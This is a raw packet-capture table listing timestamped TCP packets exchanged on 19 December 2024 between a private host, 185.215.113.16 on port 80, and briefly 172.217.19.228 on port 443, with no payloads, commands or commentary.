Dec 19, 2024 10:10:37.883940935 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.883999109 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.884140015 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.885267019 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.885329008 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.885377884 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.886677980 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.886739969 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.886796951 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.888055086 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.888133049 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.888282061 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.889633894 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.889683962 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.889693975 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.889734030 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.890789986 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.890949965 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.891007900 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.892153978 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.892287016 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.892354965 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.893580914 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.893697023 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.893764973 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.895019054 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.895093918 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.895153999 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.896290064 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.896425962 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.896486998 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.897696972 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.897758961 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.897820950 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.899130106 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.899187088 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.899199963 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.900002956 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.900969982 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.901082039 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.901146889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.902081966 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.902196884 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.902256966 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.903284073 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.903350115 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.903450012 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.903808117 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.904798031 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.904815912 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.904881954 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.906023979 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.906086922 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.906469107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.906544924 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.907428980 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.907517910 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.907593966 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.908747911 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.908865929 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.908905029 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.908936977 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.910140991 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.910264969 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.910330057 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.911537886 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.911691904 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.911770105 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.912982941 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.913110018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.913219929 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.914407015 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.914443970 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.914464951 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.914505005 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.915680885 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.915805101 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.915865898 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.917144060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.917254925 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.917321920 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.918412924 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.918472052 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.918534040 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.918534040 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.919817924 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.919933081 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.919997931 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.921216011 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.921314955 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.921376944 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.922584057 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.922640085 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.032790899 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.032989979 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.033071041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.033523083 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.033593893 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.033611059 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.033781052 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.034849882 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.034931898 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.035002947 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.035104036 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.035907030 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.035964966 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.035995960 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.036041975 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.037070990 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.037127972 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.037134886 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.037406921 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.038333893 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.038371086 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.038419962 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.038449049 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.039376974 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.039498091 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.039503098 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.039561033 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.050327063 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.050399065 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.050457001 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.050513983 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.050904036 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.050971985 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.051044941 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.051100969 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.051997900 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.052062035 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.052134991 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.052257061 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.053054094 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.053113937 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.053145885 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.053345919 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.054142952 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.054217100 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.054280996 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.054393053 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.055167913 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.055248022 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.055330038 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.055381060 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.056293011 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.056377888 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.056443930 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.056498051 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.057374954 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.057429075 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.057547092 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.057598114 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.058242083 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.058372974 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.058455944 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.058643103 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.058706999 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.059593916 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.059712887 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.059784889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.060774088 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.060827017 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.060910940 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.060965061 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.061765909 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.061825037 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.061893940 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.061999083 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.062902927 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.062957048 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.063178062 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.063234091 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.064130068 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.064202070 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.064240932 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.064296007 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.065046072 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.065107107 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.065140009 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.065192938 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.066138983 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.066205978 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.066277981 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.066334009 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.067291021 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.067351103 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.067363977 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.067413092 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.068344116 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.068397999 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.068459034 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.068516970 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.069421053 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.069535017 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.069540024 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.069608927 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.070558071 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.070614100 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.070671082 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.070807934 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.071616888 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.071811914 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.071868896 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.072695017 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.072751045 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.072948933 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.073008060 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.073801041 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.073925972 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.073942900 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.074340105 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.074893951 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.074949026 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.075042963 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.075098991 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.076028109 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.076085091 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.076117039 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.076179981 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.077117920 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.077171087 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.077250004 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.077331066 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.078219891 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.078318119 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.078382015 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.079428911 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.079498053 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.079539061 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.079603910 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.080413103 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.080471992 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.080564976 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.080746889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.081549883 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.081604958 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.081650019 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.081705093 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.082609892 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.082667112 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.082730055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.082787991 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.083713055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.083771944 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.083776951 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.083818913 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.084780931 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.084856987 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.084928989 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.085061073 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.085894108 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.085947990 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.086148024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.086210966 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.086942911 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.086997032 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.087064028 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.087114096 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.088061094 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.088125944 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.088169098 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.088224888 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.089180946 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.089236975 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.089237928 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.089379072 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.090234995 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.090293884 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.090295076 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.090338945 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.091345072 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.091392994 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.091445923 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.091619015 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.092523098 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.092580080 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.092631102 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.092678070 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.093621969 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.093825102 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.093875885 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.094615936 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.094768047 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.094820023 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.096081018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.096137047 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.096364975 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.097073078 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.097213984 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.097266912 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.098279953 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.098335028 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.098400116 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.099191904 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.099247932 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.099247932 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.099347115 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.100173950 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.100322008 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.175896883 CET	49940	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:38.175962925 CET	443	49940	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:38.176043987 CET	49940	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:38.176335096 CET	49940	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:38.176352024 CET	443	49940	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:38.225600958 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.225687027 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.225692987 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.225907087 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.226114035 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.226217985 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.226286888 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.226344109 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.227143049 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.227221966 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.227371931 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.227432013 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.228323936 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.228408098 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.228439093 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.228522062 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.229223967 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.229298115 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.229319096 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.229353905 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.230081081 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.230243921 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.230251074 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.230298996 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.231236935 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.231275082 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.231306076 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.231350899 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.242381096 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.242574930 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.242619038 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.242651939 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.242968082 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.243026972 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.243033886 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.243515968 CET	49928	80	192.168.2.6	185.215.113.16
